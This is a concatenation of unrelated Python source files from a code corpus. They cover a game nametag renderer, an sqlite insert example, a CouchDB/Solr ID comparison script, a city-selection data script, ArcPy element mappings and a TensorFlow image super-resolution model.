manager.managePopup(self)
def unmanage(self, manager):
Nametag.unmanage(self, manager)
manager.unmanagePopup(self)
def setObjectCode(self, objcode):
if self.m_group:
self.m_group.setObjectCode(objcode)
def getObjectCode(self):
if self.m_group:
return self.m_group.getObjectCode()
return 0
def getScore(self):
if self.m_group:
return 1000 - self.getDistance2()
return 0
def getDistance2(self):
if self.m_avatar:
np = self.m_avatar
else:
np = self.m_group.getAvatar()
if np.isEmpty():
return 0
return np.getPos(NametagGlobals._toon).lengthSquared()
def considerVisible(self):
from NametagGroup import NametagGroup
v2 = 0
do_update = True
if self.m_on != NametagGlobals._master_arrows_on:
self.m_on = NametagGlobals._master_arrows_on
v2 = 1
if self.m_seq2d == NametagGlobals._margin_prop_seq:
if not v2:
do_update = False
else:
self.m_seq2d = NametagGlobals._margin_prop_seq
if do_update:
self.updateContents()
if not self.m_chat_contents:
return 0
result = self.m_group.m_nametag3d_flag != 2
if NametagGlobals._onscreen_chat_forced and self.m_chat_contents & (Nametag.CSpeech | Nametag.CThought):
result = 1
self.m_group.setNametag3dFlag(0)
if result and self.m_group.getColorCode() in (NametagGroup.CCToonBuilding,
NametagGroup.CCSuitBuilding,
NametagGroup.CCHouseBuilding):
return self.getDistance2() < 1600
return result
def updateContents(self):
self.stopFlash()
if self.m_group:
self.setName(self.m_group.getName())
else:
self.setName('unnamed')
if self.m_copied_np:
self.m_copied_np.removeNode()
if self.m_attached_np:
self.m_attached_np.removeNode()
if self.m_arrow:
self.m_arrow.removeNode()
if self.m_unknown_np:
self.m_unknown_np.removeNode()
self.m_chat_contents = self.determineContents()
if not NametagGlobals._master_arrows_on:
self.m_chat_contents = self.m_chat_contents & ~1
if self.m_visible and self.isGroupManaged():
v10 = self.m_chat_contents
if v10 & Nametag.CSpeech:
self.generateChat(NametagGlobals._speech_balloon_2d)
elif v10 & Nametag.CThought:
self.generateChat(NametagGlobals._thought_balloon_2d)
elif v10 & Nametag.CName:
self.generateName()
def frameCallback(self):
if self.m_visible and self.m_popup_region:
self.m_seq = self.m_group.m_region_seq
if self.m_group:
self.m_group.updateRegions()
def rotateArrow(self):
if not self.m_arrow:
return
if self.m_avatar:
np = self.m_avatar
else:
np = self.m_group.getAvatar()
if not np:
return
relpos = np.getPos(NametagGlobals._camera) - NametagGlobals._toon.getPos(NametagGlobals._camera)
hpr = Vec3(0, 0, -math.atan2(relpos[1], relpos[0]) * 180 / math.pi)
scale = Vec3(0.5, 0.5, 0.5)
shear = Vec3(0, 0, 0)
temp_mat_3 = Mat3()
composeMatrix(temp_mat_3, scale, shear, hpr)
arrow_mat = Mat4(temp_mat_3, self.m_trans_vec)
self.m_arrow.setMat(arrow_mat)
def generateName(self):
v4 = self.getState()
v84 = Vec4(NametagGlobals.getNameFg(self.m_group.getColorCode(), v4))
v75 = Vec4(NametagGlobals.getNameBg(self.m_group.getColorCode(), v4))
v75[3] = max(v75[3], NametagGlobals._min_2d_alpha)
v75[3] = min(v75[3], NametagGlobals._max_2d_alpha)
v67 = NametagGlobals._card_pad[3] + self.m_group.m_name_frame[3]
v68 = self.m_group.m_name_frame[2] - NametagGlobals._card_pad[2]
wordwrap = self.m_group.getNameWordwrap()
v17 = self.m_cell_width / wordwrap * 2.0
v66 = 0.333 * (1.0 / v17) - (v68 + v67) * 0.5
v18 = min(1.0 / v17 - v67, v66)
v69 = Mat4(v17, 0, 0, 0,
0, v17, 0, 0,
0, 0, v17, 0,
0, 0, v18 * v17, 1.0)
a3 = v69
if v75[3] != 0.0:
card = CardMaker('nametag')
card.setFrame(self.m_group.m_name_frame[0] - NametagGlobals._card_pad[0],
self.m_group.m_name_frame[1] + NametagGlobals._card_pad[1],
v68, v67)
card.setColor(v75)
if NametagGlobals._nametag_card:
card.setSourceGeometry(NametagGlobals._nametag_card.node(),
NametagGlobals._nametag_card_frame)
self.m_attached_np = self.m_np.attachNewNode(card.generate())
self.m_attached_np.setMat(v69)
if v75[3] != 1.0:
self.m_attached_np.setTransparency(1)
if self.m_has_draw_order:
bin = config.GetString('nametag-fixed-bin', 'fixed')
self.m_attached_np.setBin(bin, self.m_draw_order)
self.m_copied_np = self.m_group.copyNameTo(self.m_np)
self.m_copied_np.setMat(a3)
if self.m_has_draw_order:
bin = config.GetString('nametag-fixed-bin', 'fixed')
self.m_copied_np.setBin(bin, self.m_draw_order)
self.m_copied_np.setColor(v84)
if v84[3] != 1.0:
self.m_copied_np.setTransparency(1)
reducer = SceneGraphReducer()
reducer.applyAttribs(self.m_copied_np.node())
reducer.applyAttribs(self.m_attached_np.node())
if NametagGlobals._arrow_model:
self.m_arrow = NametagGlobals._arrow_model.copyTo(self.m_np)
if self.m_has_draw_order:
bin = config.GetString('nametag-fixed-bin', 'fixed')
self.m_arrow.setBin(bin, self.m_draw_order)
self.m_trans_vec = a3.xformPoint(Point3(0, 0, v68 - 1.0))
color = Vec4(NametagGlobals.getArrowColor(self.m_group.getColorCode()))
self.m_arrow.setColor(color)
if color[3] != 1.0:
self.m_arrow.setTransparency(1)
self.rotateArrow()
elif self.m_arrow:
self.m_arrow.removeNode()
v69 = self.m_np.getNetTransform().getMat()
v69 = a3 * v69
v77 = v69.xformPoint(Point3(self.m_group.m_name_frame[0] - NametagGlobals._card_pad[0], 0, v68))
v80 = v69.xformPoint(Point3(self.m_group.m_name_frame[1] + NametagGlobals._card_pad[1], 0, v67))
frame = Vec4(v77[0], v80[0], v77[2], v80[2])
self.setRegion(frame, 0)
def generateChat(self, balloon):
v5 = self.getState()
text_color = Vec4(NametagGlobals.getChatFg(self.m_group.getColorCode(), v5))
balloon_color = Vec4(NametagGlobals.getChatBg(self.m_group.getColorCode(), v5))
if self.m_group.m_chat_flags & CFQuicktalker:
balloon_color = Vec4(self.m_group.getQtColor())
balloon_color[3] = max(balloon_color[3], NametagGlobals._min_2d_alpha)
balloon_color[3] = min(balloon_color[3], NametagGlobals._max_2d_alpha)
text = self.m_group.getChat()
if self.m_group.m_name:
text = '%s: %s' % (self.m_group.m_name, text)
has_page_button = False
has_quit_button = False
if not self.m_group.m_has_timeout:
has_page_button = self.m_group.m_chat_flags & CFPageButton
if self.m_group.getPageNumber() >= self.m_group.getNumChatPages() - 1:
if self.m_group.m_chat_flags & CFQuitButton:
has_page_button = False
has_quit_button = True
page_button = None
if has_page_button:
page_button = NametagGlobals.getPageButton(v5)
elif has_quit_button:
page_button = NametagGlobals.getQuitButton(v5)
reversed = self.m_group.m_chat_flags & CFReversed
new_button = [None]
balloon_result = balloon.generate(text, self.m_group.getChatFont(), self.m_wordwrap,
text_color, balloon_color, False,
self.m_has_draw_order, self.m_draw_order,
page_button, self.m_group.willHaveButton(),
reversed, new_button)
self.m_unknown_np = self.m_np.attachNewNode(balloon_result)
v88 = 8.0 # XXX THIS IS A GUESS
v49 = 2 * self.m_cell_width
a6 = v49 / (v88 + 1.0)
v50 = balloon.m_text_height * balloon.m_hscale
v85 = balloon.m_hscale * 5.0
v88 = v50 * 0.5
v113 = -(balloon.m_hscale * 0.5 + v85)
v51 = -(NametagGlobals._balloon_text_origin[2] + v88)
v118 = Mat4(a6, 0, 0, 0,
0, a6, 0, 0,
0, 0, a6, 0,
v113 * a6, 0, v51 * a6, 1.0)
self.m_unknown_np.setMat(v118)
reducer = SceneGraphReducer()
reducer.applyAttribs(self.m_unknown_np.node())
v66 = self.m_np.getNetTransform().getMat()
# XXX THE LINES BELOW ARE A GUESS
v67 = v113 * a6
v68 = v51 * a6
v94 = v66.xformPoint(Point3(v67, 0.0, v68))
v97 = v66.xformPoint(Point3(-v67, 0.0, -v68))
frame = Vec4(v94[0], v97[0], v94[2], v97[2])
self.setRegion(frame, 0)
def cullCallback(self, *args):
self.rotateArrow()
if self.m_visible and self.m_popup_region:
self.m_seq = self.m_group.getRegionSeq()
| StarcoderdataPython |
5133790 | #adding data to the database
import sqlite3
conn=sqlite3.connect('employee.db')
c = conn.cursor()
#c.execute("""CREATE TABLE employees (
# first text,
# last text,
# pay integer
# )""")
#We are hashing out the create table command since we have already created a table
#let us now insert values into the table
c.execute("INSERT INTO employees VALUES('Hoping','Grasshopper',5000)")
#we are inserting values into the table like employee first name, last name and pay
conn.commit()
conn.close()
#if we execute this code, the data gets written into the specified database file
#if you dont get any error in the first run, then the data is successfully inserted into the table
| StarcoderdataPython |
1839169 | # pylint: disable=missing-docstring
try:
A = 2
except ValueError:
A = 24
pass # [unnecessary-pass]
| StarcoderdataPython |
6493528 | # -*- coding: utf-8 -*-
import argparse
try:
import configparser
except:
import ConfigParser as configparser
from get_solr_json import get_solr_json
import requests
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('collection_id')
parser.add_argument(
'outdir',
nargs=1, )
argv = parser.parse_args()
config = configparser.SafeConfigParser()
config.read('report.ini')
solr_url = config.get('new-index', 'solrUrl')
api_key = config.get('new-index', 'solrAuth')
couchdb_url = config.get('couchdb', 'url')
cid = argv.collection_id
url_couchdb_collection_ids = '{}/couchdb/ucldc/_design/all_provider_docs' \
'/_view/by_provider_name?key="{}"'.format(couchdb_url, cid)
print("URL:{}".format(url_couchdb_collection_ids))
#may need to do paging here
resp = requests.get(url_couchdb_collection_ids, verify=False)
rows = resp.json()['rows']
couchdb_ids = [x['id'] for x in rows]
solr_url = config.get('new-index', 'solrUrl')
api_key = config.get('new-index', 'solrAuth')
#get solr ids
solr_query = {
'rows': 100,
'sort': 'id asc',
'fl': 'harvest_id_s',
'q':
'collection_url:"https://registry.cdlib.org/api/v1/collection/{}/"'.
format(cid),
'cursorMark': '*'
}
solr_ids = []
while 1:
solr_json = get_solr_json(solr_url, solr_query, api_key=api_key)
solr_docs = solr_json['response']['docs']
if not solr_docs:
break
solr_query['cursorMark'] = solr_json['nextCursorMark']
solr_ids.extend([x['harvest_id_s'] for x in solr_docs])
not_in_solr = []
for couchid in couchdb_ids:
if couchid not in solr_ids:
not_in_solr.append(couchid)
print(not_in_solr)
# Copyright © 2016, Regents of the University of California
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the University of California nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
| StarcoderdataPython |
3457676 | <gh_stars>10-100
'''analyze WORKING/samples2/train.csv (the training data) to select cities used to build local models
Summarize samples2/train.csv, select 12 cities
and use the summary to create a table of cities ordered by number of trades
INVOCATION
python select-cities2.py n_cities [--test] [--trace]
INPUTS
WORKING/samples2/train.csv
OUTPUTS
WORKING/select-cities2/city-medianprice-ntrades.csv
WORKING/select-cities2/city-medianprice-ntrades-all.txt
WORKING/select-cities2/city-medianprice-ntrades-selected.txt
WORKING/select-cities2/0log.txt
'''
from __future__ import division
import argparse
import collections
import json
import numpy as np
import os
import pandas as pd
import pdb
from pprint import pprint
import random
import sys
import arg_type
from Bunch import Bunch
import columns_table
from ColumnsTable import ColumnsTable
import dirutility
import layout_transactions
from Logger import Logger
from Path import Path
from Report import Report
from Timer import Timer
def make_control(argv):
'return a Bunch'
print argv
parser = argparse.ArgumentParser()
parser.add_argument('--test', action='store_true')
parser.add_argument('--trace', action='store_true')
arg = parser.parse_args(argv)
arg.me = parser.prog.split('.')[0]
if arg.trace:
pdb.set_trace()
random_seed = 123
random.seed(random_seed)
np.random.seed(random_seed)
dir_working = Path().dir_working()
dir_out = os.path.join(dir_working, arg.me + ('-test' if arg.test else ''))
dirutility.assure_exists(dir_out)
base = 'city_medianprice_ntrades'
base_all = base + '_all'
base_selected = base + '_selected'
return Bunch(
arg=arg,
path_in_column_defs=os.path.join('column_defs.json'),
path_in_samples=os.path.join(dir_working, 'samples2', 'train.csv'),
path_out_csv_all=os.path.join(dir_out, base_all + '.csv'),
path_out_csv_selected=os.path.join(dir_out, base_selected + '.csv'),
path_out_report_all=os.path.join(dir_out, base_all + '.txt'),
path_out_report_selected=os.path.join(dir_out, base_selected + '.txt'),
path_out_log=os.path.join(dir_out, '0log.txt'),
random_seed=random_seed,
timer=Timer(),
)
def etl(path_in, nrows, test):
'return DataFrames with columns city, median price, n trades: all and those selected'
'''return (median_price OrderedDict[city] float, n_cities OrderedDict[city] float)'''
city_column = layout_transactions.city
price_column = layout_transactions.price
extracted = pd.read_csv(
path_in,
nrows=nrows,
usecols=[city_column, price_column],
low_memory=False
)
print 'read %d samples from file %s' % (len(extracted), path_in)
# build columns for the DataFrame result
distinct_cities = set(extracted[city_column])
selected_n_trades = (
277, 296, 303, 351, # about half the median
638, 640, 642, 660, # about the median number of trades (median is 641)
4480, 5613, 10610, 22303, # largest number of trades
)
cities = []
median_prices = np.empty(len(distinct_cities))
n_trades = np.empty(len(distinct_cities))
selecteds = []
for i, city in enumerate(distinct_cities):
mask = extracted[city_column] == city
in_city = extracted.loc[mask]
assert len(in_city) > 0, city
cities.append(city)
median_prices[i] = in_city.median()
n_trades[i] = len(in_city)
selecteds.append(True if test else len(in_city) in selected_n_trades)
# check that the counting by city is reasonable
print 'sorted(n_trades)'
print sorted(n_trades)
print 'median', np.median(n_trades)
if not test:
assert sum(n_trades) == len(extracted)
for selected_n_trade in selected_n_trades:
assert selected_n_trade in n_trades, selected_n_trade
result_all = pd.DataFrame(
data={
'city': cities,
'median_price': median_prices,
'n_trades': n_trades,
'selected': selecteds,
},
index=cities,
)
result_selected = result_all.loc[result_all.selected]
result_all_sorted = result_all.sort_values('n_trades')
result_selected_sorted = result_selected.sort_values('n_trades')
print result_selected_sorted
return result_all_sorted, result_selected_sorted
def do_work(control):
'create csv file that summarizes all actual and predicted prices'
def make_indices(ordered_dict):
'return OrderedDict[key] <index relative to median value of ordered_dict>'
values = np.empty(len(ordered_dict), dtype=float)
for i, value in enumerate(ordered_dict.values()):
values[i] = value
median_value = np.median(values)
result = collections.OrderedDict()
for k, v in ordered_dict.iteritems():
result[k] = v / median_value
return result, median_value
df_all, df_selected = etl(
control.path_in_samples,
10 if control.arg.test else None,
control.arg.test,
)
df_all.to_csv(control.path_out_csv_all)
df_selected.to_csv(control.path_out_csv_selected)
with open(control.path_in_column_defs, 'r') as f:
column_defs = json.load(f)
pprint(column_defs)
def make_generate_data(df):
'yield each input deail line as a dict-like object'
def generate_data():
for i, row in df.iterrows():
yield row
return generate_data
def create_and_write(df, path, header_lines, selected_columns):
'create report and write it'
lines = columns_table.columns_table(
make_generate_data(df)(),
selected_columns,
column_defs,
header_lines,
)
with open(path, 'w') as f:
for line in lines:
f.write(line)
create_and_write(
df_all,
control.path_out_report_all,
['Count of Trades in All Cities', 'Ordered by Count of Number of Trades'],
['city', 'median_price', 'n_trades', 'selected'],
)
create_and_write(
df_selected,
control.path_out_report_selected,
['Count of Trades in Selected Cities', 'Ordered by Count of Number of Trades'],
['city', 'median_price', 'n_trades'],
)
def main(argv):
control = make_control(argv)
sys.stdout = Logger(control.path_out_log) # now print statements also write to the log file
print control
lap = control.timer.lap
do_work(control)
lap('work completed')
if control.arg.test:
print 'DISCARD OUTPUT: test'
print control
print 'done'
return
if __name__ == '__main__':
if False:
# avoid pyflakes warnings
pdb.set_trace()
pprint()
main(sys.argv[1:])
| StarcoderdataPython |
9718961 | # -*- coding: utf-8 -*-
from .dec import DecFileParser
from .enums import known_decay_models
__all__ = ("DecFileParser", "known_decay_models")
| StarcoderdataPython |
1949185 | dict_arcpy_arcObj_types = {
"Text": "TEXT_ELEMENT",
"Data Frame": "DATAFRAME_ELEMENT",
"Map Surround Frame": "MAPSURROUND_ELEMENT",
"Kartenumgebungsrahmen": "MAPSURROUND_ELEMENT",
"Legend": "LEGEND_ELEMENT",
"North Arrow": "MAPSURROUND_ELEMENT",
"Scale Bar": "MAPSURROUND_ELEMENT",
"Rectangle": "GRAPHIC_ELEMENT",
"Rechteck": "GRAPHIC_ELEMENT",
'Ellipse': 'GRAPHIC_ELEMENT',
'Circle': 'GRAPHIC_ELEMENT',
'Kreis': 'GRAPHIC_ELEMENT',
'Polygon': 'GRAPHIC_ELEMENT',
"Line": "GRAPHIC_ELEMENT",
"Linie": "GRAPHIC_ELEMENT",
"Picture": "PICTURE_ELEMENT",
"Bild": "PICTURE_ELEMENT",
}
dict_units = {
0 : "Unknown",
1 : "In",
2 : "Pt",
3 : "Ft",
4 : "Yd",
5 : "MI",
6 : "SM",
7 : "MM",
8 : "CM",
9 : "M",
10 : "KM",
11 : "DD",
12 : "DM",
}
dict_vertical_position = {
0: '0',
1: '0',
2: '0',
3: '1',
4: '1',
}
dict_line_style = {
0: 'Line Ticks Up',
1: 'Line Ticks Up',
2: 'Line Ticks Middle',
3: 'Line Ticks Down',
4: 'Line Ticks Down',
}
dict_geometry = {
'Rectangle': '1',
'Rechteck': '1',
'Ellipse': '0',
'Circle': '0',
'Kreis': '0',
'Polygon': '2',
}
| StarcoderdataPython |
6523126 | import os
import random
import pickle
import math
import tensorflow as tf
import cv2
import numpy as np
import matplotlib.pyplot as plt
def random_crop(src, size):
height = src.shape[0]
width = src.shape[1]
max_right = width - size[0] - 1
max_bottom = height - size[1] - 1
x = random.randint(0, max_right)
y = random.randint(0, max_bottom)
cropped = src[y: y + size[1], x: x + size[0]]
return cropped
def extract_patch_list(src, size, stride):
patch_list = []
height = src.shape[0]
width = src.shape[1]
size_w = size[0]
size_h = size[1]
stride_w = stride[0]
stride_h = stride[1]
w_q = (width - size_w) // stride_w
h_q = (height - size_h) // stride_h
for h in range(h_q):
for w in range(w_q):
patch = src[h * stride_h: h * stride_h + size_h,
w * stride_w: w * stride_w + size_w]
patch_list.append(patch)
return patch_list
def load_img_list(dir_path):
img_list = []
name_list = os.listdir(dir_path)
for name in name_list:
img_path = "{}/{}".format(dir_path, name)
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_list.append(img)
return img_list
def load_img_list_and_extract_patch_list(dir_path, size, stride):
patch_list_all = []
img_list = load_img_list(dir_path)
for img in img_list:
patch_list = extract_patch_list(img, size, stride)
patch_list_all.extend(patch_list)
return patch_list_all
def blur_img_list(img_list, scale=2):
result_list = []
for img in img_list:
height = img.shape[0]
width = img.shape[1]
w = round(width / scale)
h = round(height / scale)
result = cv2.resize(img, (w, h), interpolation=cv2.INTER_CUBIC)
result = cv2.resize(result, (width, height), interpolation=cv2.INTER_CUBIC)
result_list.append(result)
return result_list
"""
Model
"""
def conv2d(X, n_input, n_output, filter_size, activation=None, name=None, W=None, b=None):
with tf.variable_scope(name):
if W is None:
W = tf.get_variable(
name='W_1',
shape=[filter_size[0], filter_size[1], n_input, n_output],
initializer=tf.contrib.layers.xavier_initializer_conv2d())
if b is None:
b = tf.get_variable(
name='b_1',
shape=[n_output],
initializer=tf.constant_initializer(0.))
h = tf.nn.conv2d(X,
W,
strides=[1, 1, 1, 1],
padding='SAME'
)
if activation != None:
h = activation(tf.nn.bias_add(h, b))
return h, W, b
class USRCNN(object):
def __init__(self, sess):
self.sess = sess
self.shape = (41, 41, 3)
self.mean_img = None
self.std_img = None
self.min_loss = None
self.build_model()
sess.run(tf.global_variables_initializer())
self.saver = tf.train.Saver()
def load(self, sess, weights_path, meta_path):
self.saver.restore(sess, weights_path)
with open(meta_path, "rb") as f:
meta = pickle.load(f)
self.mean_img = meta['mean_img']
self.std_img = meta['std_img']
self.min_loss = meta['min_loss']
def save(self, sess, weights_path, meta_path, min_loss, flag_export_graph=False, graph_path=None):
meta = {
"mean_img": self.mean_img,
"std_img": self.std_img,
"shape": self.shape,
"min_loss": min_loss
}
with open(meta_path, "wb") as f:
pickle.dump(meta, f)
self.saver.save(sess, weights_path, latest_filename="recent.ckpt", write_meta_graph=flag_export_graph)
def build_model(self):
height = self.shape[0]
width = self.shape[1]
channel = self.shape[2]
X = tf.placeholder(tf.float32, shape=[None, height, width, channel], name='X')
Y = tf.placeholder(tf.float32, shape=[None, height, width, channel], name='Y')
start_learning_rate = tf.placeholder(tf.float32, name='learning_rate')
global_step = tf.Variable(0, trainable=False)
embeding_layer_info_list = [
{'name': 'embed/conv_1',
'n_input': 3,
'n_output': 128,
'filter_size': (3, 3),
'activation': tf.nn.relu},
{'name': 'embed/conv_2',
'n_input': 128,
'n_output': 128,
'filter_size': (3, 3),
'activation': tf.nn.relu},
]
inference_layer_info = {'name': 'inference/conv_1',
'n_input': 128,
'n_output': 128,
'filter_size': (3, 3),
'activation': tf.nn.relu}
reconstruction_layer_info = {'name': 'reconstruction/conv_1',
'n_input': 128,
'n_output': 3,
'filter_size': (3, 3),
'activation': None}
current_input = X
# embedding network
for info in embeding_layer_info_list:
current_input, _, _ = conv2d(X=current_input,
n_input=info['n_input'],
n_output=info['n_output'],
filter_size=info['filter_size'],
activation=info['activation'],
name=info['name'],
)
# inference network
inference_layer_output_list = []
info = inference_layer_info
recursion = 9
current_input, W, b = conv2d(X=current_input,
n_input=info['n_input'],
n_output=info['n_output'],
filter_size=info['filter_size'],
activation=info['activation'],
name=info['name'] + '/first',
)
for i in range(recursion):
current_input, _, _ = conv2d(X=current_input,
n_input=info['n_input'],
n_output=info['n_output'],
filter_size=info['filter_size'],
activation=info['activation'],
name=info['name'] + '/' + str(i),
W=W,
b=b)
inference_layer_output_list.append(current_input)
# reconstruction network
local_output_list = []
info = reconstruction_layer_info
for i, inference in enumerate(inference_layer_output_list):
local_output, _, _ = conv2d(X=inference,
n_input=info['n_input'],
n_output=info['n_output'],
filter_size=info['filter_size'],
activation=info['activation'],
name=info['name'] + "/inference_{}".format(i), )
local_output = tf.add(local_output, X)
local_output_5d = tf.expand_dims(local_output, 0)
local_output_list.append(local_output_5d)
local_output_concat = tf.concat(local_output_list,0)
print("local_output_concat shape : {}".format(local_output_concat.get_shape().as_list()))
average_img = tf.reduce_mean(local_output_concat, axis=0, name='average_output')
print("average_image shape : {}".format(average_img.get_shape().as_list()))
Y_pred = average_img
print("Y_pred shape : {}".format(Y_pred.get_shape().as_list()))
print("Y shape : {}".format(Y.get_shape().as_list()))
cost = tf.reduce_mean(tf.reduce_sum(tf.square(Y_pred - Y), axis=[1, 2, 3]), axis=0, name="reduce_mean_cost")
learning_rate = tf.train.exponential_decay(start_learning_rate, global_step,
10000, 0.96, staircase=True)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
self.X = X
self.Y = Y
self.Y_pred = Y_pred
self.cost = cost
self.optimizer = optimizer
self.start_learning_rate = start_learning_rate
self.gloabal_step = global_step
def train(self, X_train, Y_train, batch_size, n_epoch, start_learning_rate, save_dir_path, X_valid=None,
Y_valid=None):
fig, axs = plt.subplots(1, 4, figsize=(20, 6))
if self.min_loss is None:
self.min_loss = 999999999
# figure
epoch_list = []
loss_list = []
if self.mean_img is None or self.std_img is None:
self.mean_img = np.mean(Y_train, axis=0)
self.std_img = np.std(Y_train, axis=0)
print("make mean_img and std_img")
height = self.shape[0]
width = self.shape[1]
channel = self.shape[2]
test_img_source = (X_train, Y_train) if Y_valid is None else (X_valid, Y_valid)
test_img_idx = random.randint(0, len(test_img_source))
for epoch_i in range(n_epoch):
print("epoh_i : {}".format(epoch_i))
rand_idx_list = np.random.permutation(range(len(X_train)))
n_batch = len(rand_idx_list) // batch_size
for batch_i in range(n_batch):
rand_idx = rand_idx_list[batch_i * batch_size: (batch_i + 1) * batch_size]
batch_x = X_train[rand_idx]
batch_y = Y_train[rand_idx]
self.sess.run(self.optimizer,
feed_dict={self.X: (batch_x - self.mean_img) / self.std_img,
self.Y: (batch_y - self.mean_img) / self.std_img,
self.start_learning_rate: start_learning_rate})
loss = self.sess.run(self.cost, feed_dict={self.X: (X_valid - self.mean_img) / self.std_img,
self.Y: (Y_valid - self.mean_img) / self.std_img})
print("loss : {}".format(loss))
epoch_list.append(epoch_i)
loss_list.append(loss)
if loss < self.min_loss:
self.min_loss = loss
weights_path = "{}/weights".format(save_dir_path)
meta_path = "{}/meta_data.pickle".format(save_dir_path)
self.save(self.sess, weights_path=weights_path, meta_path=meta_path, min_loss=self.min_loss)
print("-" * 30)
print("Saved!")
print("weights_path : {}".format(weights_path))
print("meta_data_path : {}".format(meta_path))
print("-" * 30)
if epoch_i % 10 == 0:
test_img_origin = test_img_source[1][test_img_idx]
test_img_query = test_img_source[0][test_img_idx]
test_img_recon = np.reshape(test_img_query, [-1, height, width, channel])
test_img_recon = self.Y_pred.eval(feed_dict={self.X: (test_img_recon - self.mean_img) / self.std_img},
session=self.sess)
test_img_recon = np.reshape(test_img_recon, [height, width, channel])
test_img_recon = test_img_recon * self.std_img + self.mean_img
test_img_recon = np.clip(test_img_recon, 0, 255)
test_img_recon = test_img_recon.astype(np.uint8)
axs[0].imshow(test_img_origin)
axs[0].set_title("origin")
axs[1].imshow(test_img_query)
axs[1].set_title("query")
axs[2].imshow(test_img_recon)
axs[2].set_title("reconstructed image_{}".format(epoch_i))
axs[3].plot(epoch_list, loss_list)
axs[3].set_xlabel("epoch_i")
axs[3].set_ylabel("loss")
axs[3].set_title("loss_{}".format(epoch_i))
plt.pause(0.05)
return self.sess
def run(self, src):
expand_ratio = 1.2
times = 8
target = src
target = self.enhance_resolution(target)
for i in range(times):
shape = target.shape
height_resize = round(shape[0] * expand_ratio)
width_resize = round(shape[1] * expand_ratio)
target = cv2.resize(target, (width_resize, height_resize))
target = self.enhance_resolution(target)
return target
def enhance_resolution(self, src):
height = self.shape[0]
width = self.shape[1]
channel = self.shape[2]
mean_img = self.mean_img
std_img = self.std_img
patch_list, shape = self.divide_img_to_patch(src, (width, height))
patch_recon_list = []
for patch in patch_list:
patch_normalized = (patch - mean_img) / std_img
patch_normalized = patch_normalized.reshape([1, height, width, channel])
patch_recon = self.sess.run(self.Y_pred, feed_dict={self.X: patch_normalized})
patch_recon = np.reshape(patch_recon, [height, width, channel])
patch_recon = patch_recon * std_img + mean_img
patch_recon = np.clip(patch_recon, 0, 255)
patch_recon = patch_recon.astype(np.uint8)
patch_recon_list.append(patch_recon)
row_list = []
for row in range(shape[0]):
col_list = []
for col in range(shape[1]):
col_list.append(patch_recon_list[row * shape[1] + col])
row = np.concatenate(col_list, axis=1)
row_list.append(row)
recon_img = np.concatenate(row_list, axis=0)
recon_img = recon_img[:src.shape[0], :src.shape[1]]
return recon_img
def divide_img_to_patch(self, src, size):
patch_list = []
img_h = src.shape[0]
img_w = src.shape[1]
size_h = size[1]
size_w = size[0]
width_q = math.ceil(img_w / size_w)
height_q = math.ceil(img_h / size_h)
background = np.zeros(shape=(height_q * size_h, width_q * size_w, 3), dtype=src.dtype)
background[:img_h, :img_w] = src
src_with_background = background
shape = (height_q, width_q)
for h_i in range(height_q):
for w_i in range(width_q):
patch = src_with_background[h_i * size_h:(h_i + 1) * size_h, w_i * size_w: (w_i + 1) * size_w]
patch_list.append(patch)
return patch_list, shape
def run():
height = 50
width = 50
channel = 3
img_list = load_img_list_and_extract_patch_list("./data/urban_hr", (width, height))
X_all = np.array(blur_img_list(img_list, (width, height)))
Y_all = np.array(img_list)
mean_img = np.mean(Y_all, axis=0)
std_img = np.std(Y_all, axis=0)
# data
rand_idx = np.random.permutation(range(len(X_all)))
X_all = X_all[rand_idx]
Y_all = Y_all[rand_idx]
train_ratio = 0.8
valid_ratio = 0.1
test_ratio = 0.1
data_num = len(X_all)
train_data_num = round(data_num * train_ratio)
valid_data_num = round(data_num * valid_ratio)
test_data_num = round(data_num * test_ratio)
X_train = X_all[:train_data_num]
Y_train = Y_all[:train_data_num]
X_valid = X_all[train_data_num:train_data_num + valid_data_num]
Y_valid = Y_all[train_data_num:train_data_num + valid_data_num]
X_test = X_all[train_data_num + valid_data_num:train_data_num + valid_data_num + test_data_num]
Y_test = Y_all[train_data_num + valid_data_num:train_data_num + valid_data_num + test_data_num]
sess = tf.Session()
usrcnn = USRCNN(sess)
usrcnn.load(sess, './model/weights', './model/meta_data.pickle')
usrcnn.train(X_train, Y_train, X_valid=X_valid, Y_valid=Y_valid,
batch_size=64, n_epoch=3000, save_dir_path='./model')
return usrcnn
def test():
def load_img_list_and_extract_patch_list(dir_path):
name_list = os.listdir(dir_path)
img_list = []
for name in name_list:
img_path = "{}/{}".format(dir_path, name)
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_list.append(img)
return img_list
test_img_list = load_img_list_and_extract_patch_list("./data/celeba")
test_img = test_img_list[10]
test_img_resized = cv2.resize(test_img, (test_img.shape[1] // 3, test_img.shape[0] // 3),
interpolation=cv2.INTER_CUBIC)
test_img_resized = cv2.resize(test_img_resized, (test_img.shape[1], test_img.shape[0]),
interpolation=cv2.INTER_CUBIC)
